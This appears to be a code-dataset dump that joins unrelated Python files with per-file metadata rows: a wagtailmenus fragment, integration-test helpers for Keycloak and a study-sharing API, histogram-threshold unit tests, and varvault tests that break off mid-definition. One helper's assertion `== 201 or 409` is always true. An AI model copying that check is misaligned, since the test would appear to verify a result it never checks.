Useful for developers extending wagtailmenus, and need to the actual model.
Defaults to the standard :class:`~wagtailmenus.models.FlatMenu` model
if no custom model is defined.
"""
from wagtailmenus.conf import settings
return settings.models.FLAT_MENU_MODEL
| 32.137931 | 79 | 0.74088 | 265 | 1,864 | 5.045283 | 0.279245 | 0.094241 | 0.068063 | 0.08377 | 0.755423 | 0.740464 | 0.740464 | 0.740464 | 0.647719 | 0.647719 | 0 | 0.002647 | 0.189378 | 1,864 | 57 | 80 | 32.701754 | 0.882197 | 0.542382 | 0 | 0.235294 | 0 | 0 | 0.055182 | 0.048452 | 0 | 0 | 0 | 0 | 0 | 1 | 0.235294 | false | 0 | 0.294118 | 0 | 0.764706 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
4c3f84640426c9117240b704ddf84e5119b74ec0 | 12,044 | py | Python | util.py | OsiriX-Foundation/IntegrationTest | a6c76f8a6f242aa0668b3417999dbae3d986e136 | [
"MIT"
] | null | null | null | util.py | OsiriX-Foundation/IntegrationTest | a6c76f8a6f242aa0668b3417999dbae3d986e136 | [
"MIT"
] | 9 | 2020-12-21T17:02:49.000Z | 2021-06-02T07:41:28.000Z | util.py | OsiriX-Foundation/IntegrationTest | a6c76f8a6f242aa0668b3417999dbae3d986e136 | [
"MIT"
] | null | null | null | import os
import requests
from requests.auth import AuthBase
import json
import urllib
from threading import Thread
import time
import pytest
import env
def print_request(methode, response, url):
print("\t" + methode + " " + url + " ["+ str(response.status_code) + " " + requests.status_codes._codes[response.status_code][0].upper() + ", " + str(int(response.elapsed.total_seconds()*1000))+"ms]")
print_info(response.content)
def urlencode(data):
return urllib.parse.urlencode(data)
def print_info(info):
if env.env_var.get("PRINT_INFO"):
print(info)
def print_json(json_object):
print(json.dumps(json_object, indent=4, sort_keys=True))
def add_user_keycloak(admin_username, admin_password, user_name, user_firstname, user_mail, user_username, user_password):
well_known_url = env.env_var.get("KEYCLOAK_URL") + "/auth/realms/master" + "/.well-known/openid-configuration"
response = requests.get(well_known_url)
assert response.status_code == 200
well_known = json.loads(response.content)
assert "token_endpoint" in well_known
token_endpoint = well_known["token_endpoint"]
headers = {"Content-Type": "application/x-www-form-urlencoded"}
data = {"grant_type": "password", "username": admin_username, "password": admin_password, "client_id":"admin-cli"}
response = requests.post(token_endpoint, headers=headers, data=data)
token_response = json.loads(response.content)
admin_token = token_response["access_token"]
create_user_url = env.env_var.get("KEYCLOAK_URL") +"/auth/admin/realms/"+ env.env_var.get("KEYCLOAK_REALM") + "/users"
headers = {"Content-Type": "application/json;charset=UTF-8", "Authorization": "Bearer " + admin_token}
data = {"enabled":True, "attributes":{}, "username":user_username, "emailVerified":True,"email":user_mail, "firstName":user_firstname, "lastName":user_name}
data = json.dumps(data)
response = requests.post(create_user_url, headers=headers, data=data)
assert response.status_code == 201 or 409
if "Location" in response.headers.keys():
reset_password_url = response.headers["Location"] + "/reset-password"
headers = {"Content-Type": "application/json;charset=UTF-8", "Authorization": "Bearer " + admin_token}
data = {"type":"password", "value":user_password, "temporary":False}
data = json.dumps(data)
response = requests.put(reset_password_url, headers=headers, data=data)
assert response.status_code == 204
else:
print("user already exist")
print(response.content)
def get_token(username, password, client_id="loginConnect"):
well_known_url = env.env_var.get("KEYCLOAK_URL") + "/auth/realms/" + env.env_var.get("KEYCLOAK_REALM") + "/.well-known/openid-configuration"
response = requests.get(well_known_url)
assert response.status_code == 200
well_known = json.loads(response.content)
assert "token_endpoint" in well_known
token_endpoint = well_known["token_endpoint"]
headers = {"Content-Type": "application/x-www-form-urlencoded"}
data = {"grant_type": "password", "username": username, "password": password, "client_id":client_id}
response = requests.post(token_endpoint, headers=headers, data=data)
token_response = json.loads(response.content)
return token_response["access_token"]
def register(token):
request_url = env.env_var.get("URL") + "/register"
headers = {"Content-Type": "application/x-www-form-urlencoded"}
data = {"access_token": token}
response = requests.post(request_url, headers=headers, data=data)
token_response = json.loads(response.content)
return token_response
################################################################
# REPORT PROVIDER
################################################################
def new_report_provider(token, data, album_id, status_code=201):
print()
request_url = env.env_var.get("URL") + "/albums/"+str(album_id)+"/reportproviders"
headers = {"Authorization": "Bearer "+ token, "Content-Type": "application/x-www-form-urlencoded"}
response = requests.post(request_url, headers=headers, data=urlencode(data))
print_request("POST", response, request_url)
assert response.status_code == status_code
if status_code == 201:
reportprovider = json.loads(response.content)
return reportprovider
def test_report_provider_uri(token, url):
print()
request_url = env.env_var.get("URL") + "/reportproviders/metadata"
headers = {"Authorization": "Bearer "+ token, "Content-Type": "application/x-www-form-urlencoded"}
data = {"url": url}
response = requests.post(request_url, headers=headers, data=urlencode(data))
print_request("POST", response, request_url)
assert response.status_code == 200
metadata = json.loads(response.content)
return metadata
def get_report_provider(token, client_id, album_id, status_code=200):
print()
request_url = env.env_var.get("URL") + "/albums/" + str(album_id) + "/reportproviders/" + str(client_id)
headers = {"Authorization": "Bearer "+ token}
response = requests.get(request_url, headers=headers)
print_request("GET", response, request_url)
assert response.status_code == status_code
if status_code == 200:
reportprovider = json.loads(response.content)
return reportprovider
def report_provider_list(token, album_id, params={}, count=1):
print()
request_url = env.env_var.get("URL") + "/albums/"+str(album_id)+"/reportproviders"
headers = {"Authorization": "Bearer "+ token}
response = requests.get(request_url, headers=headers, params=params)
print_request("GET", response, request_url)
assert response.status_code == 200
assert response.headers.get("X-Total-Count") == str(count)
report_providers = json.loads(response.content)
return report_providers
def edit_report_provider(token, client_id, album_id, data, status_code=200):
print()
request_url = env.env_var.get("URL") + "/albums/" + str(album_id) + "/reportproviders/" + str(client_id)
headers = {"Authorization": "Bearer "+ token, "Content-Type": "application/x-www-form-urlencoded"}
response = requests.patch(request_url, headers=headers, data=urlencode(data))
print_request("PATCH", response, request_url)
assert response.status_code == status_code
if status_code == 200:
reportprovider = json.loads(response.content)
return reportprovider
def delete_report_provider(token, client_id, album_id, status_code=204):
print()
request_url = env.env_var.get("URL") + "/albums/" + str(album_id) + "/reportproviders/" + str(client_id)
headers = {"Authorization": "Bearer "+ token}
response = requests.delete(request_url, headers=headers)
print_request("DELETE", response, request_url)
assert response.status_code == status_code
################################################################
# SERIES & STUDIES
################################################################
def share_series_in_album(token, studies_UID, series_UID, album_id, X_Authorization_Source = "", status_code=201):
print()
request_url = env.env_var.get("URL") + "/studies/"+studies_UID+"/series/"+series_UID+"/albums/"+album_id
headers = {"Authorization": "Bearer "+ token, "Content-Type": "application/x-www-form-urlencoded"}
if X_Authorization_Source != "":
headers["X-Authorization-Source"] = "Bearer " + X_Authorization_Source
response = requests.put(request_url, headers=headers)
print_request("PUT", response, request_url)
assert response.status_code == status_code
def share_study_in_album(token, studies_UID, album_id, X_Authorization_Source = "", status_code=201):
print()
request_url = env.env_var.get("URL") + "/studies/"+studies_UID+"/albums/"+album_id
headers = {"Authorization": "Bearer "+ token, "Content-Type": "application/x-www-form-urlencoded"}
if X_Authorization_Source != "":
headers["X-Authorization-Source"] = "Bearer " + X_Authorization_Source
response = requests.put(request_url, headers=headers)
print_request("PUT", response, request_url)
assert response.status_code == status_code
def share_study_in_album_from_album(token, studies_UID, album_src_id, album_dst_id, status_code=201):
print()
request_url = env.env_var.get("URL") + "/studies/" + studies_UID + "/albums/" + album_dst_id
headers = {"Authorization": "Bearer "+ token, "Content-Type": "application/x-www-form-urlencoded"}
params = {"album": album_src_id}
response = requests.put(request_url, headers=headers, params=params)
print_request("PUT", response, request_url)
assert response.status_code == status_code
def share_series_with_user(token, user, studies_UID, series_UID, status_code=201):
print()
request_url = env.env_var.get("URL") + "/studies/"+studies_UID+"/series/"+series_UID+"/users/"+user
headers = {"Authorization": "Bearer "+ token, "Content-Type": "application/x-www-form-urlencoded"}
response = requests.put(request_url, headers=headers)
print_request("PUT", response, request_url)
assert response.status_code == status_code
def share_study_with_user(token, user, studies_UID, status_code=201):
print()
request_url = env.env_var.get("URL") + "/studies/"+studies_UID+"/users/"+user
headers = {"Authorization": "Bearer "+ token, "Content-Type": "application/x-www-form-urlencoded"}
response = requests.put(request_url, headers=headers)
print_request("PUT", response, request_url)
assert response.status_code == status_code
def delete_series_from_inbox(token, studies_UID, series_UID, status_code=204):
print()
request_url = env.env_var.get("URL") + "/studies/"+studies_UID+"/series/"+series_UID
headers = {"Authorization": "Bearer "+ token}
response = requests.delete(request_url, headers=headers)
print_request("DELETE", response, request_url)
assert response.status_code == status_code
def delete_study_from_inbox(token, studies_UID, status_code=204):
print()
request_url = env.env_var.get("URL") + "/studies/"+studies_UID
headers = {"Authorization": "Bearer "+ token}
response = requests.delete(request_url, headers=headers)
print_request("DELETE", response, request_url)
assert response.status_code == status_code
def delete_series_from_album(token, studies_UID, series_UID, album_id, status_code=204):
print()
request_url = env.env_var.get("URL") + "/studies/"+studies_UID+"/series/"+series_UID+"/albums/"+album_id
headers = {"Authorization": "Bearer "+ token}
response = requests.delete(request_url, headers=headers)
print_request("DELETE", response, request_url)
assert response.status_code == status_code
def appropriate_study(token, studies_UID, X_Authorization_Source = "", status_code=201):
print()
request_url = env.env_var.get("URL") + "/studies/"+studies_UID
headers = {"Authorization": "Bearer "+ token}
if X_Authorization_Source != "":
headers["X-Authorization-Source"] = "Bearer " + X_Authorization_Source
response = requests.put(request_url, headers=headers)
print_request("PUT", response, request_url)
assert response.status_code == status_code
def appropriate_series(token, studies_UID, series_UID, X_Authorization_Source = "", status_code=201):
print()
request_url = env.env_var.get("URL") + "/studies/"+studies_UID+"/series/"+series_UID
headers = {"Authorization": "Bearer "+ token}
if X_Authorization_Source != "":
headers["X-Authorization-Source"] = "Bearer " + X_Authorization_Source
response = requests.put(request_url, headers=headers)
print_request("PUT", response, request_url)
assert response.status_code == status_code
| 49.360656 | 205 | 0.685902 | 1,458 | 12,044 | 5.425926 | 0.095336 | 0.066995 | 0.026166 | 0.034888 | 0.809506 | 0.789913 | 0.772342 | 0.755404 | 0.722033 | 0.688788 | 0 | 0.008006 | 0.159997 | 12,044 | 243 | 206 | 49.563786 | 0.773945 | 0.002657 | 0 | 0.613861 | 0 | 0 | 0.179496 | 0.052302 | 0 | 0 | 0 | 0 | 0.113861 | 1 | 0.113861 | false | 0.034653 | 0.044554 | 0.00495 | 0.19802 | 0.20297 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
4c69f5da9ca2d14f9581bb29d3fa738b285b97e5 | 8,349 | py | Python | tests/unittests/test_threshold_results.py | Siegallab/PIE | 54b4dfd3fe340b1bc69187dacf8c6b583714d65b | [
"MIT"
] | 2 | 2021-03-24T03:05:27.000Z | 2022-02-18T06:10:30.000Z | tests/unittests/test_threshold_results.py | Siegallab/PIE | 54b4dfd3fe340b1bc69187dacf8c6b583714d65b | [
"MIT"
] | null | null | null | tests/unittests/test_threshold_results.py | Siegallab/PIE | 54b4dfd3fe340b1bc69187dacf8c6b583714d65b | [
"MIT"
] | null | null | null | #!/usr/bin/python
'''
Tests that thresholds for input histograms produce correct results
'''
import unittest
import os
import numpy as np
from PIE import adaptive_threshold
from numpy.testing import assert_allclose
#from plotnine import *
#import pandas as pd
# Old SFig2A: 'xy01_08ms_3702': 11752
# Old SFig2B: 't10xy0320': 2662.2
# Old SFig2C: 'xy01_14ms_3702': 14240
# Old SFig2D: 't02xy0225': 10338
# Old SFig2E: 't09xy1107': 6816
class Test_mu1PosThresholdMethodTwoGauss(unittest.TestCase):
'''
Tests images that were run through _mu1PosThresholdMethodTwoGauss-equivalent
method in matlab, and compares thresholds arrived at there with the
ones identified by PIE.adaptive_threshold
'''
@classmethod
def setUpClass(self):
# set relative fold tolerance for comparison of expected and
# actual thresholds
self.rel_tolerance = 0.2
def _get_threshold(self, im_name):
'''
Opens histogram file (calculated in matlab) corresponding to
im_name, reads in smoothed log histogram, calculates and returns
threshold via PIE.adaptive_threshold._mu1PosThresholdMethodTwoGauss
'''
im_path = os.path.join('tests', 'test_ims',
(im_name + '_best_hist.csv'))
hist_data = np.loadtxt(im_path, delimiter=',')
x_pos = hist_data[0]
ln_hist_smooth = hist_data[2]
threshold_method = \
adaptive_threshold._mu1PosThresholdMethodTwoGauss(x_pos, ln_hist_smooth)
threshold = threshold_method.get_threshold()
p = threshold_method.plot()
# print(p)
# print(threshold)
return(threshold)
def test_xy01_08ms_3702(self):
test_threshold = self._get_threshold('xy01_08ms_3702')
expected_threshold = 11752
assert_allclose(expected_threshold, test_threshold,
rtol = self.rel_tolerance)
def test_t10xy0320(self):
test_threshold = self._get_threshold('t10xy0320')
expected_threshold = 2662.2
assert_allclose(expected_threshold, test_threshold,
rtol = self.rel_tolerance)
def test_xy01_14ms_3702(self):
test_threshold = self._get_threshold('xy01_14ms_3702')
expected_threshold = 14240
assert_allclose(expected_threshold, test_threshold,
rtol = self.rel_tolerance)
class Test_mu1ReleasedThresholdMethod(unittest.TestCase):
'''
Tests images that were run through _mu1ReleasedThresholdMethod-
equivalent method in matlab, and compares thresholds arrived at
there with the ones identified by PIE.adaptive_threshold
'''
@classmethod
def setUpClass(self):
# set relative fold tolerance for comparison of expected and
# actual thresholds
self.rel_tolerance = 0.2
def _get_threshold(self, im_name):
'''
Opens histogram file (calculated in matlab) corresponding to
im_name, reads in smoothed log histogram, calculates and returns
threshold via PIE.adaptive_threshold._mu1ReleasedThresholdMethod
'''
im_path = os.path.join('tests', 'test_ims',
(im_name + '_best_hist.csv'))
hist_data = np.loadtxt(im_path, delimiter=',')
x_pos = hist_data[0]
ln_hist_smooth = hist_data[2]
threshold_method = \
adaptive_threshold._mu1ReleasedThresholdMethod(x_pos,
ln_hist_smooth)
threshold = threshold_method.get_threshold()
return(threshold)
def test_t02xy0225(self):
test_threshold = self._get_threshold('t02xy0225')
expected_threshold = 10338
assert_allclose(expected_threshold, test_threshold,
rtol = self.rel_tolerance)
def test_t10xy0320(self):
'''
This histogram would be sent to sliding circle method
'''
test_threshold = self._get_threshold('t10xy0320')
expected_threshold = np.nan
assert_allclose(expected_threshold, test_threshold,
rtol = self.rel_tolerance)
class Test_DataSlidingCircleThresholdMethod(unittest.TestCase):
'''
Tests that threshold calculated for images by slide_circle_data
function in matlab PIE code is close to the one calculated by
PIE.adaptive_threshold._DataSlidingCircleThresholdMethod
'''
@classmethod
def setUpClass(self):
# set relative fold tolerance for comparison of expected and
# actual thresholds
self.rel_tolerance = 0.3
def _get_threshold(self, im_name):
'''
Opens histogram file (calculated in matlab) corresponding to
im_name, reads in smoothed log histogram, calculates and returns
threshold via
PIE.adaptive_threshold._DataSlidingCircleThresholdMethod
'''
im_path = os.path.join('tests', 'test_ims',
(im_name + '_best_hist.csv'))
hist_data = np.loadtxt(im_path, delimiter=',')
x_pos = hist_data[0]
ln_hist = hist_data[1]
threshold_method = \
adaptive_threshold._DataSlidingCircleThresholdMethod(x_pos, ln_hist)
threshold = threshold_method.get_threshold()
# print('\n')
# p = threshold_method.plot()
# print(p)
# print(im_name)
# print(threshold)
return(threshold)
def test_xy01_08ms_3702(self):
# 12608
test_threshold = self._get_threshold('xy01_08ms_3702')
expected_threshold = 9312
assert_allclose(expected_threshold, test_threshold,
rtol = self.rel_tolerance)
# def test_t10xy0320(self):
# '''
# Here, matlab threshold pretty far off-base, but even if we use
# gaussian threshold instead as the 'expected' value, data-based
# sliding circle still does a poor job
# '''
# # 5437
# test_threshold = self._get_threshold('t10xy0320')
# expected_threshold = 3103
# assert_allclose(expected_threshold, test_threshold,
# rtol = self.rel_tolerance)
def test_xy01_14ms_3702(self):
# 13360
test_threshold = self._get_threshold('xy01_14ms_3702')
expected_threshold = 13360
assert_allclose(expected_threshold, test_threshold,
rtol = self.rel_tolerance)
def test_t02xy0225(self):
# 9422.8
test_threshold = self._get_threshold('t02xy0225')
expected_threshold = 9024
assert_allclose(expected_threshold, test_threshold,
rtol = self.rel_tolerance)
def test_t09xy1107(self):
# 7141.8
test_threshold = self._get_threshold('t09xy1107')
expected_threshold = 7142
assert_allclose(expected_threshold, test_threshold,
rtol = self.rel_tolerance)
class Test_FitSlidingCircleThresholdMethod(unittest.TestCase):
'''
Tests that threshold calculated for images by slide_circle_data
function on smooth log histogram in matlab PIE code is close to the
one calculated by
PIE.adaptive_threshold._FitSlidingCircleThresholdMethod
'''
@classmethod
def setUpClass(self):
# set relative fold tolerance for comparison of expected and
# actual thresholds
self.rel_tolerance = 0.3
def _get_threshold(self, im_name):
'''
Opens histogram file (calculated in matlab) corresponding to
im_name, reads in smoothed log histogram, calculates and returns
threshold via PIE.adaptive_threshold._FitSlidingCircleThresholdMethod
'''
im_path = os.path.join('tests', 'test_ims',
(im_name + '_best_hist.csv'))
hist_data = np.loadtxt(im_path, delimiter=',')
x_pos = hist_data[0]
ln_hist_smooth = hist_data[2]
threshold_method = \
adaptive_threshold._FitSlidingCircleThresholdMethod(x_pos, ln_hist_smooth)
threshold = threshold_method.get_threshold()
# print('\n')
# print(threshold_method._x_centers)
# print(threshold_method._radius)
# p = threshold_method.plot()
# print(p)
# print(im_name)
# print(threshold)
return(threshold)
def test_xy01_08ms_3702(self):
# 9856
test_threshold = self._get_threshold('xy01_08ms_3702')
expected_threshold = 9312
assert_allclose(expected_threshold, test_threshold,
rtol = self.rel_tolerance)
def test_t10xy0320(self):
'''
Here, threshold differs a lot from that calculated via gaussians
because default lower bound is higher than optimal threshold
'''
# 7686.1
# strangely only fails in python 3, where threshold is estimated as 22533...
test_threshold = self._get_threshold('t10xy0320')
expected_threshold = 7686
assert_allclose(expected_threshold, test_threshold,
rtol = self.rel_tolerance)
def test_xy01_14ms_3702(self):
# 12579
test_threshold = self._get_threshold('xy01_14ms_3702')
expected_threshold = 13360
assert_allclose(expected_threshold, test_threshold,
rtol = self.rel_tolerance)
def test_t02xy0225(self):
# 10507
test_threshold = self._get_threshold('t02xy0225')
expected_threshold = 9024
assert_allclose(expected_threshold, test_threshold,
rtol = self.rel_tolerance)
def test_t09xy1107(self):
# 7931
test_threshold = self._get_threshold('t09xy1107')
expected_threshold = 7142
assert_allclose(expected_threshold, test_threshold,
rtol = self.rel_tolerance) | 31.269663 | 78 | 0.770032 | 1,074 | 8,349 | 5.709497 | 0.175047 | 0.063601 | 0.049576 | 0.048924 | 0.779517 | 0.77593 | 0.774951 | 0.762883 | 0.703359 | 0.703359 | 0 | 0.056775 | 0.14349 | 8,349 | 267 | 79 | 31.269663 | 0.800727 | 0.369625 | 0 | 0.834586 | 0 | 0 | 0.052818 | 0 | 0 | 0 | 0 | 0 | 0.112782 | 1 | 0.165414 | false | 0 | 0.037594 | 0 | 0.233083 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
d5b58f2b1d8ad6443842e186cb6f795f75997fd3 | 36 | py | Python | scrapers/facebook/__init__.py | nprapps/graeae | b38cdd3de74fb239fdcc92619e92bcfb0818bda3 | [
"MIT"
] | 5 | 2015-06-10T15:37:46.000Z | 2015-10-12T15:28:37.000Z | scrapers/facebook/__init__.py | nprapps/graeae | b38cdd3de74fb239fdcc92619e92bcfb0818bda3 | [
"MIT"
] | 175 | 2015-04-14T20:14:57.000Z | 2015-07-13T13:50:45.000Z | scrapers/facebook/__init__.py | nprapps/graeae | b38cdd3de74fb239fdcc92619e92bcfb0818bda3 | [
"MIT"
] | 3 | 2015-08-27T14:34:09.000Z | 2021-02-23T11:03:40.000Z | from scraper import FacebookScraper
| 18 | 35 | 0.888889 | 4 | 36 | 8 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 36 | 1 | 36 | 36 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
d5cfa5e9971bdac78756a3724ddd78dea169c8a0 | 42,482 | py | Python | tests/test_vault.py | data-ductus/varvault | d7f489eb0501ec2d931d6f62717d69b6aded8d95 | [
"Apache-2.0"
] | 1 | 2021-11-12T17:23:08.000Z | 2021-11-12T17:23:08.000Z | tests/test_vault.py | data-ductus/varvault | d7f489eb0501ec2d931d6f62717d69b6aded8d95 | [
"Apache-2.0"
] | null | null | null | tests/test_vault.py | data-ductus/varvault | d7f489eb0501ec2d931d6f62717d69b6aded8d95 | [
"Apache-2.0"
] | null | null | null | import os
import sys
import json
import pytest
import logging
import tempfile
DIR = os.path.dirname(os.path.realpath(__file__))
path = f"{os.path.dirname(DIR)}"
temp_path = [path]
temp_path.extend(sys.path)
sys.path = temp_path
import varvault
logger = logging.getLogger("pytest")
vault_file_new = f"{DIR}/new-vault.json"
vault_file_new_secondary = f"{DIR}/new-vault-secondary.json"
existing_vault = f"{DIR}/existing-vault.json"
faulty_existing_vault = f"{DIR}/faulty-existing-vault.json"
faulty_vault_key_missmatch = f"{DIR}/faulty-vault-key-missmatch.json"
class Keyring(varvault.Keyring):
key_valid_type_is_str = varvault.Key("key_valid_type_is_str", valid_type=str)
key_valid_type_is_int = varvault.Key("key_valid_type_is_int", valid_type=int)
class VaultStructDict(varvault.VaultStructDictBase):
def __init__(self, value_1: str, value_2: int, **kwargs):
super(VaultStructDict, self).__init__(**kwargs)
assert isinstance(value_1, str)
assert isinstance(value_2, int)
self.value_1 = value_1
self.value_2 = value_2
def internal_function(self):
pass
@classmethod
def build_from_vault_key(cls, vault_key, vault_value):
obj = VaultStructDict(**vault_value)
return obj
class VaultStructList(varvault.VaultStructListBase):
def __init__(self, value_1: str, value_2: int, *args):
super(VaultStructList, self).__init__(*args)
assert isinstance(value_1, str)
assert isinstance(value_2, int)
self.value_1 = value_1
self.value_2 = value_2
self.extend([value_1, value_2])
def internal_function(self):
pass
@classmethod
def build_from_vault_key(cls, vault_key, vault_value):
obj = VaultStructList(*vault_value)
return obj
class VaultStructString(varvault.VaultStructStringBase):
def __new__(cls, string_value, extra_value, *args, **kwargs):
assert isinstance(string_value, str)
obj = super().__new__(cls, string_value)
obj.string_value = string_value
obj.extra_value = extra_value
return obj
def internal_function(self):
pass
@classmethod
def build_from_vault_key(cls, vault_key, vault_value):
obj = VaultStructString(string_value=vault_value, extra_value="extra_value-cannot-possibly-be-saved-to-a-string")
return obj
class VaultStructFloat(varvault.VaultStructFloatBase):
def __new__(cls, float_value, extra_value, *args, **kwargs):
assert isinstance(float_value, float)
obj = super().__new__(cls, float_value)
obj.float_value = float_value
obj.extra_value = extra_value
return obj
def internal_function(self):
pass
@classmethod
def build_from_vault_key(cls, vault_key, vault_value):
obj = VaultStructFloat(float_value=vault_value, extra_value="extra_value-cannot-possibly-be-saved-to-a-float")
return obj
class VaultStructInt(varvault.VaultStructIntBase):
def __new__(cls, int_value, extra_value, *args, **kwargs):
assert isinstance(int_value, int)
obj = super().__new__(cls, int_value)
obj.int_value = int_value
obj.extra_value = extra_value
return obj
def internal_function(self):
pass
@classmethod
def build_from_vault_key(cls, vault_key, vault_value):
obj = VaultStructInt(int_value=vault_value, extra_value="extra_value-cannot-possibly-be-saved-to-an-int")
return obj
class KeyringVaultStruct(varvault.Keyring):
key_vault_struct_dict = varvault.Key("key_vault_struct_dict", valid_type=VaultStructDict)
key_vault_struct_list = varvault.Key("key_vault_struct_list", valid_type=VaultStructList)
key_vault_struct_string = varvault.Key("key_vault_struct_string", valid_type=VaultStructString)
key_vault_struct_float = varvault.Key("key_vault_struct_float", valid_type=VaultStructFloat)
key_vault_struct_int = varvault.Key("key_vault_struct_int", valid_type=VaultStructInt)
class TestVault:
@classmethod
def setup_class(cls):
logger.info(tempfile.tempdir)
tempfile.tempdir = "/tmp" if sys.platform == "darwin" or sys.platform == "linux" else tempfile.gettempdir()
logger.info(tempfile.tempdir)
def setup_method(self):
try:
os.remove(vault_file_new)
except:
pass
try:
os.remove(vault_file_new_secondary)
except:
pass
def test_assert_true(self):
assert True
logger.info(DIR)
def test_create_new_vault(self):
vault = varvault.create_vault(Keyring, "vault", varvault_vault_filename_to=vault_file_new, varvault_filehandler_class=varvault.FileTypes.JSON)
@vault.vaulter(return_keys=Keyring.key_valid_type_is_str)
def _set_valid():
return "valid-key"
_set_valid()
assert vault.get(Keyring.key_valid_type_is_str) == "valid-key"
@vault.vaulter(return_keys=Keyring.key_valid_type_is_int)
def _set_invalid():
return "invalid-key; must be int"
try:
_set_invalid()
pytest.fail(f"Somehow managed to set an invalid value to key {Keyring.key_valid_type_is_int} (valid type: {Keyring.key_valid_type_is_int.valid_type})")
except Exception as e:
assert "Key 'key_valid_type_is_int' requires type to be '<class 'int'>'" in str(e), f"Unexpected error: {e}"
logger.info(f"Expected error received; test passed")
assert Keyring.key_valid_type_is_int not in vault
def test_put(self):
vault = varvault.create_vault(Keyring, "vault", varvault_vault_filename_to=vault_file_new, varvault_filehandler_class=varvault.FileTypes.JSON)
mv = varvault.MiniVault({Keyring.key_valid_type_is_str: "value", Keyring.key_valid_type_is_int: 1})
vault.vault.put(mv)
assert Keyring.key_valid_type_is_str in vault
assert Keyring.key_valid_type_is_int in vault
vault = varvault.create_vault(Keyring, "vault", varvault_vault_filename_to=vault_file_new, varvault_filehandler_class=varvault.FileTypes.JSON)
vault.vault.put(Keyring.key_valid_type_is_str, "value")
assert Keyring.key_valid_type_is_str in vault
def test_create_from_vault(self):
vault = varvault.from_vault(Keyring, "from-vault", existing_vault, varvault.FileTypes.JSON)
assert Keyring.key_valid_type_is_str in vault
assert Keyring.key_valid_type_is_int in vault
assert vault.get(Keyring.key_valid_type_is_str) == "valid"
assert vault.get(Keyring.key_valid_type_is_int) == 1
d = json.load(open(existing_vault))
assert Keyring.key_valid_type_is_str in d and Keyring.key_valid_type_is_int in d, "It appears that loading from the vault file has cleared the vault file unintentionally. This is very bad"
def test_load_from_one_write_to_another(self):
vault = varvault.from_vault(Keyring, "from-vault", existing_vault, varvault.FileTypes.JSON, varvault_vault_filename_to=vault_file_new)
@vault.vaulter(varvault.VaultFlags.permit_modifications(), input_keys=Keyring.key_valid_type_is_str, return_keys=Keyring.key_valid_type_is_str)
def mod(**kwargs):
key_valid_type_is_str = kwargs.get(Keyring.key_valid_type_is_str)
assert key_valid_type_is_str == "valid"
modded = f"modded"
return modded
mod()
assert vault.get(Keyring.key_valid_type_is_str) == "modded"
assert json.load(open(vault_file_new)).get(Keyring.key_valid_type_is_str) == "modded", f"The value for {Keyring.key_valid_type_is_str} in vault_filename_to is not the expected"
assert json.load(open(existing_vault)).get(Keyring.key_valid_type_is_str) == "valid", f"The value for {Keyring.key_valid_type_is_str} in vault_filename_from has changed. This is very bad"
def test_create_from_vault_no_valid_type_in_key(self):
class KeyringTemp(varvault.Keyring):
key_valid_type_is_str = varvault.Key("key_valid_type_is_str")
key_valid_type_is_int = varvault.Key("key_valid_type_is_int")
vault = varvault.from_vault(KeyringTemp, "from-vault", existing_vault, varvault.FileTypes.JSON, varvault_vault_filename_to=vault_file_new)
def test_permit_modifications(self):
vault = varvault.create_vault(Keyring, "vault", varvault_vault_filename_to=vault_file_new, varvault_filehandler_class=varvault.FileTypes.JSON)
vault.insert(Keyring.key_valid_type_is_str, "valid")
try:
@vault.vaulter(return_keys=Keyring.key_valid_type_is_str)
def _set():
return "new-value-that-should-not-go-in"
_set()
pytest.fail("Managed to set a new value to an existing key while modifications are not permitted")
except Exception as e:
logger.info(f"Expected error received; test passed")
assert vault.get(Keyring.key_valid_type_is_str) == "valid", f"Value for {Keyring.key_valid_type_is_str} is not what it should be"
@vault.vaulter(varvault.VaultFlags.permit_modifications(), return_keys=Keyring.key_valid_type_is_str)
def _set():
return "new-modified-value"
_set()
assert vault.get(Keyring.key_valid_type_is_str) == "new-modified-value", f"Value for {Keyring.key_valid_type_is_str} is not what it should be"
new_vault = varvault.from_vault(Keyring, "from-vault", vault_file_new, varvault.FileTypes.JSON, varvault.VaultFlags.permit_modifications())
@new_vault.vaulter(return_keys=Keyring.key_valid_type_is_str)
def _set():
return "new-modified-value-gen-2"
_set()
assert new_vault.get(Keyring.key_valid_type_is_str) == "new-modified-value-gen-2", f"Value for {Keyring.key_valid_type_is_str} is not what it should be"
def test_create_readonly_vault(self):
vault = varvault.from_vault(Keyring, "from-vault", existing_vault, varvault.FileTypes.JSON, varvault.VaultFlags.file_is_read_only())
try:
vault.insert(Keyring.key_valid_type_is_int, 1)
pytest.fail("Insert: Somehow managed to insert a value into a vault that is supposed to be read-only")
except Exception as e:
logger.info(f"Expected error received; test passed: {e}")
try:
@vault.vaulter(return_keys=Keyring.key_valid_type_is_int)
def _set():
return 1
_set()
pytest.fail("Vaulter: Somehow managed to insert a value into a vault that is supposed to be read-only")
except Exception as e:
logger.info(f"Expected error received; test passed: {e}")
def test_read_only_key_not_in_keyring(self):
